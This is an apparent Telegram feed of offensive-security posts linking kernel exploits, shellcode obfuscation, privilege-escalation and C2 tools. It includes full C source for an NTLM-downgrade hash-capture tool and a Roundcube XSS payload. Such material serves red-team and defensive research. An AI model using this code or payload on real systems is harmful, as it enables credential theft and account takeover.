Explore the Windows Kernel with HEVD, a vulnerable driver. Dive into stack overflow exploits and bypass SMEP/KPTI protections using the sysret approach.
A detailed guide for Windows kernel explotation:
— Part 0: Where do I start?
— Part 1: Will this driver ever crash?
— Part 2: Is there a way to bypass kASLR, SMEP and KVA Shadow?
— Part 3: Can we rop our way into triggering our shellcode?
— Part 4: How do we write a shellcode to elevate privileges and gracefully return to userland?
#windows #kernel #driver #hevd #hacksys
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥7
How to silently install any Chrome extension and avoid common indicators of compromise (IOCs). The method avoids using CLI parameters or registry edits, and persists via the Secure Preferences file
🔗 Source:
https://syntax-err0r.github.io/Silently_Install_Chrome_Extension.html
#chrome #persistence #maldev #c2
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16❤1👍1
Forwarded from vx-underground
How to fix the Crowdstrike thing:
1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
😁41👍6❤5
🛠 Adventures in Shellcode Obfuscation
This series of articles explores various methods for hiding shellcode, emphasizing techniques to avoid detection. The focus is on demonstrating diverse approaches to conceal shellcode.
🔗 Part 1: Overview
🔗 Part 2: Hail Caesar
🔗 Part 3: Encryption
🔗 Part 4: RC4 with a Twist
🔗 Part 5: Base64
🔗 Part 6: Two Array Method
🔗 Part 7: Flipping the Script
🔗 Part 8: Shellcode as IP Addresses
🔗 Part 9: Shellcode as UUIDs
🔗 Part 10: Shellcode as MAC Addresses
🔗 Part 11: Jargon
🔗 Part 12: Jigsaw
🔗 Part 13: Calculating Offsets
🔗 Part 14: Further Research
#shellcode #obfuscation #clang #maldev
This series of articles explores various methods for hiding shellcode, emphasizing techniques to avoid detection. The focus is on demonstrating diverse approaches to conceal shellcode.
🔗 Part 1: Overview
🔗 Part 2: Hail Caesar
🔗 Part 3: Encryption
🔗 Part 4: RC4 with a Twist
🔗 Part 5: Base64
🔗 Part 6: Two Array Method
🔗 Part 7: Flipping the Script
🔗 Part 8: Shellcode as IP Addresses
🔗 Part 9: Shellcode as UUIDs
🔗 Part 10: Shellcode as MAC Addresses
🔗 Part 11: Jargon
🔗 Part 12: Jigsaw
🔗 Part 13: Calculating Offsets
🔗 Part 14: Further Research
#shellcode #obfuscation #clang #maldev
🔥19❤5😱1
Forwarded from Offensive Xwitter
😈 [ Print3M @Print3M_ ]
I wrote my first calc.exe "shellcode" in NASM. I find it a little strange that a lot of people write about malware development but almost no one talks about writing your own shellcode. I decided to write something on my own. (good comments, easy readable)
🔗 https://github.com/Print3M/shellcodes/blob/main/calc-exe.asm
🐥 [ tweet ]
#для_самых_маленьких
I wrote my first calc.exe "shellcode" in NASM. I find it a little strange that a lot of people write about malware development but almost no one talks about writing your own shellcode. I decided to write something on my own. (good comments, easy readable)
🔗 https://github.com/Print3M/shellcodes/blob/main/calc-exe.asm
🐥 [ tweet ]
#для_самых_маленьких
❤8👍4
You can access data from deleted forks, deleted repositories and even private repositories on GitHub. And it is available forever. This is known by GitHub, and intentionally designed that way. Cross Fork Object Reference (CFOR) vulnerability occurs when one repository fork can access sensitive data from another fork (including data from private and deleted forks).
— Deleted Fork Data: Still accessible.
— Deleted Repo Data: Commits remain.
— Private Repo Data: Can become public.
🔗 Research:
https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github
#github #private #repo #cfor
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤6👍4👏1
If you want to take a happy little journey through PEB structs, PE headers and kernel32.dll Export Table to spawn some "calc.exe" on x64 using Assembly, here it is.
📚 What you will learn:
— WinAPI function manual location with Assembly;
— PEB Structure and PEB_LDR_DATA;
— PE File Structure;
— Relative Virtual Address calculation;
— Export Address Table (EAT);
— Windows x64 calling-convention in practice;
— Writing in Assembly like a real Giga-Chad...
🔗 Source:
https://print3m.github.io/blog/x64-winapi-shellcoding
#maldev #winapi #x64 #shellcode #assembly
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
🥔 DeadPotato
This is a windows privilege escalation utility from the Potato family of exploits, leveraging the SeImpersonate right to obtain SYSTEM privileges. This script has been customized from the original GodPotato source code by BeichenDream.
🔗 Source:
https://github.com/lypd0/DeadPotato
#windows #lpe #potato #seimpersonate
This is a windows privilege escalation utility from the Potato family of exploits, leveraging the SeImpersonate right to obtain SYSTEM privileges. This script has been customized from the original GodPotato source code by BeichenDream.
🔗 Source:
https://github.com/lypd0/DeadPotato
#windows #lpe #potato #seimpersonate
🔥25❤1👍1🤔1
Forwarded from Offensive Xwitter
😈 [ Cube0x0 @cube0x0 ]
Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time.
Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and MacOS environments:
🔗 https://0xc2.io
The first release was back in late 2023, initially only offered to a small circle of red teamers and soon, the registration will be open for new clients who provide threat simulation services.
All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols.
More details will be available soon.
🐥 [ tweet ]
Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time.
Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and MacOS environments:
🔗 https://0xc2.io
The first release was back in late 2023, initially only offered to a small circle of red teamers and soon, the registration will be open for new clients who provide threat simulation services.
All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols.
More details will be available soon.
🐥 [ tweet ]
🔥12👏4❤3👍1
👻 Ghost in the PPL: BYOVDLL
This blog post explores bypassing LSA Protection in Userland through the "Bring Your Own Vulnerable DLL" (BYOVDLL) technique. It also delves into the successful exploitation of vulnerabilities in the CNG Key Isolation service and the methods employed to load vulnerable DLLs within protected processes.
🔗 Source:
https://itm4n.github.io/ghost-in-the-ppl-part-1/
#lsa #lsass #ppl #dll #maldev
This blog post explores bypassing LSA Protection in Userland through the "Bring Your Own Vulnerable DLL" (BYOVDLL) technique. It also delves into the successful exploitation of vulnerabilities in the CNG Key Isolation service and the methods employed to load vulnerable DLLs within protected processes.
🔗 Source:
https://itm4n.github.io/ghost-in-the-ppl-part-1/
#lsa #lsass #ppl #dll #maldev
itm4n’s blog
Ghost in the PPL Part 1: BYOVDLL
In this series of blog posts, I will explore yet another avenue for bypassing LSA Protection in Userland. I will also detail the biggest challenges I faced while developing a proof-of-concept, and discuss some novel techniques and tricks to load an arbitrary…
🔥12😱3❤1
Forwarded from 1N73LL1G3NC3
Whitepaper_DriverJack_Abusing_Emulated_Read_Only_Filesystems_and.pdf
3.8 MB
DriverJack: Turning NTFS and Emulated Read-only Filesystems in an Infection and Persistence Vector
By: Alessandro Magnosi (@klezVirus)
DriverJack
Hijacking valid driver services to load arbitrary (signed) drivers abusing native symbolic links and NT paths
Key Attack Phases:
By: Alessandro Magnosi (@klezVirus)
DriverJack
Hijacking valid driver services to load arbitrary (signed) drivers abusing native symbolic links and NT paths
Key Attack Phases:
1) ISO Mounting and Driver Selection
1.1) The attack begins with mounting the ISO as a filesystem.
1.2) The attacker selects a service driver that can be manipulated, focusing on those that can be started or restarted without immediate detection.
2) Hijacking the Driver Path
2.1) The core of the attack involves hijacking the driver path. The methods used include:
2.2) Direct Reparse Point Abuse
2.3) DosDevice Global Symlink Abuse
2.4) Drive Mountpoint Swap
🔥11👍4❤2
Office Injector - Invokes an RPC method in OfficeClickToRun service that will inject a DLL into a suspended process running as NT AUTHORITY\SYSTEM launched by the task scheduler service, thus achieving privilege escalation from administrator to SYSTEM.
Shim Injector - Writes an undocumented shim data structure into the memory of another process that causes apphelp.dll to apply the “Inject Dll” fix on the process without registering a new SDB file on the system, or even writing such file to disk.
DefCon Presentation
🔗 Source:
https://github.com/deepinstinct/ShimMe
#windows #office #rpc #inject #lpe
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍5
Forwarded from RedTeam brazzers (Pavel Shlundin)
Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin. С правами local admin вы можете с помощью манипуляции ключами реестра сделать downgrade NTLM аутентификации до NetNTLMv1 и получить уже хеш, который можно восстановить в NTLM хеш в независимости от сложности пароля пользователя. Для этой цели я написал небольшую программу, которая бэкапит текущие настройки реестра, затем делает downgrade и через 60 сек восстанавливает все обратно.
Компилируем так
В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.
#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep
void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
HKEY hKey;
DWORD value;
DWORD valueSize = sizeof(DWORD);
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
RegCloseKey(hKey);
*oldValue = value;
} else {
printf("Ошибка чтения ключа реестра.\n");
}
}
void SetRegKey(const char* path, const char* key, DWORD newValue) {
HKEY hKey;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
RegCloseKey(hKey);
} else {
printf("Ошибка записи ключа реестра.\n");
}
}
void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}
void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}
int main() {
DWORD oldValue_LMCompatibilityLevel = 0;
DWORD oldValue_NtlmMinClientSec = 0;
DWORD oldValue_RestrictSendingNTLMTraffic = 0;
ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);
// Задержка 60 секунд
sleep(60);
NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);
return 0;
}
Компилируем так
x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c
В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.
🔥13👍5❤3👎1
Forwarded from haxx
Media is too big
VIEW IN TELEGRAM
Всем привет. Выпустил в паблик Sploitify (https://sploitify.haxx.it) - агрегатор эксплойтов/поков/райтапов с тегами по уязвимостям. Что-то вроде GTFOBins, но для эксплойтов. Сейчас в нем можно найти чекеры от nuclei (тысячи их), некоторые эксплойты на эскалацию привилегий и удаленное выполнение кода в винде и никсах. Еще много чего добавлять, но пользоваться уже можно. Надеюсь пригодится и сделает вашу жизнь немножко легче, по крайней мере такая была цель :)
13🔥21❤🔥3👍3🤔1💯1
🔐 FreeIPA Rosting (CVE-2024-3183)
A vulnerability recently discovered by my friend @Im10n in FreeIPA involves a Kerberos TGS-REQ being encrypted using the client’s session key. If a principal’s key is compromised, an attacker could potentially perform offline brute-force attacks to decrypt tickets by exploiting the encrypted key and associated salts.
🔗Source:
https://github.com/Cyxow/CVE-2024-3183-POC
#freeipa #kerberos #hashcat #cve
———
Добавляем доклад Миши в вишлист на Offzone🚶♂️
A vulnerability recently discovered by my friend @Im10n in FreeIPA involves a Kerberos TGS-REQ being encrypted using the client’s session key. If a principal’s key is compromised, an attacker could potentially perform offline brute-force attacks to decrypt tickets by exploiting the encrypted key and associated salts.
🔗Source:
https://github.com/Cyxow/CVE-2024-3183-POC
#freeipa #kerberos #hashcat #cve
———
Добавляем доклад Миши в вишлист на Offzone
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17❤🔥2👍1
APT
👻 Ghost in the PPL: BYOVDLL This blog post explores bypassing LSA Protection in Userland through the "Bring Your Own Vulnerable DLL" (BYOVDLL) technique. It also delves into the successful exploitation of vulnerabilities in the CNG Key Isolation service and…
👻 Ghost in the PPL Part 2: From BYOVDLL to Arbitrary Code Execution in LSASS
In this second installment, the author deepens the exploration of techniques for bypassing LSASS protection, focusing on arbitrary code execution by refining the PoC, exploiting vulnerabilities like CVE-2023-28229, and bypassing Control Flow Guard (CFG) through RPC-based process handle duplication.
🔗 Source:
https://itm4n.github.io/ghost-in-the-ppl-part-2/
#lsa #lsass #ppl #dll #maldev
In this second installment, the author deepens the exploration of techniques for bypassing LSASS protection, focusing on arbitrary code execution by refining the PoC, exploiting vulnerabilities like CVE-2023-28229, and bypassing Control Flow Guard (CFG) through RPC-based process handle duplication.
🔗 Source:
https://itm4n.github.io/ghost-in-the-ppl-part-2/
#lsa #lsass #ppl #dll #maldev
itm4n’s blog
Ghost in the PPL Part 2: From BYOVDLL to Arbitrary Code Execution in LSASS
In the previous part, I showed how a technique called “Bring Your Own Vulnerable DLL” (BYOVDLL) could be used to reintroduce known vulnerabilities in LSASS, even when it’s protected. In this second part, I’m going to discuss the strategies I considered and…
🔥8
🔍 Deep Dive into Windows IPv6 TCP/IP
An overview of CVE-2024-38063, a remote code execution vulnerability in Windows IPv6 TCP/IP. Includes a technical summary, PoC instructions and a reproduction guide.
🔗 Research:
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html
🔗 PoC:
https://github.com/ynwarcs/CVE-2024-38063
#windows #kernel #ipv6 #rce #poc
An overview of CVE-2024-38063, a remote code execution vulnerability in Windows IPv6 TCP/IP. Includes a technical summary, PoC instructions and a reproduction guide.
🔗 Research:
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html
🔗 PoC:
https://github.com/ynwarcs/CVE-2024-38063
#windows #kernel #ipv6 #rce #poc
Malwaretech
CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
Performing a root cause analysis & building proof-of-concept for CVE-2024-38063, a CVSS 9.8 Vulnerability In the Windows Kernel IPv6 Parser
🔥8👍3❤1
APT
🔍 Deep Dive into Windows IPv6 TCP/IP An overview of CVE-2024-38063, a remote code execution vulnerability in Windows IPv6 TCP/IP. Includes a technical summary, PoC instructions and a reproduction guide. 🔗 Research: https://malwaretech.com/2024/08/exploiting…
В продолжение темы. Мои коллеги по цеху и дорогие друзья выложили ресерч на тему CVE-2024-38063. Подробнее о результатах можно почитать тут.
Отдельный респект хочу выразить — @pturtle и @thsage
Давайте поддержим ребят лайком ❤️
Отдельный респект хочу выразить — @pturtle и @thsage
Давайте поддержим ребят лайком ❤️
BI.ZONE
Анализ критической уязвимости Windows CVE-2024-38063
Разбираем ошибку в сетевом стеке Windows, которая позволяет удаленно получить полный контроль над компьютером без действий со стороны пользователя
🔥17❤9👍5
A critical Cross-Site Scripting (XSS) vulnerability has been found in Roundcube Webmail, enabling attackers to inject and execute arbitrary JavaScript upon viewing a malicious email. This vulnerability could lead to the theft of emails, contacts, and passwords, as well as unauthorized email sending from the victim's account.
🛠 PoC:
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(origin) foo=bar"> Foo </body>
🔗 Source:
https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail
#roundcube #xss #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥4❤1
Forwarded from purple shift
Мейнфреймы IBM на базе операционки z/OS могут показаться вымершими динозаврами из глубокого прошлого. Однако велики шансы, что в сердце ваших бизнес-процессов жужжат именно эти шкафы. Их можно встретить во многих крупных организациях, где требуется обработка большого количества транзакций (банки, биржи, аэропорты и др.)
Из-за высокой стоимости и узкой специализации мейнфреймы редко встречаются в проектах по анализу защищённости. Поэтому в публичном доступе очень мало знаний о том, как тестировать мейнфреймы на проникновение и как детектировать атаки на них.
Наш эксперт Денис Степанов собирает такие знания – всё, что понадобится пентестеру, чтобы получить контроль над мейнфреймом, повысить привилегии, найти возможные вектора для бокового перемещения и эксфильтровать данные:
https://securelist.ru/zos-mainframe-pentesting/110237/
Из-за высокой стоимости и узкой специализации мейнфреймы редко встречаются в проектах по анализу защищённости. Поэтому в публичном доступе очень мало знаний о том, как тестировать мейнфреймы на проникновение и как детектировать атаки на них.
Наш эксперт Денис Степанов собирает такие знания – всё, что понадобится пентестеру, чтобы получить контроль над мейнфреймом, повысить привилегии, найти возможные вектора для бокового перемещения и эксфильтровать данные:
https://securelist.ru/zos-mainframe-pentesting/110237/
🔥13❤1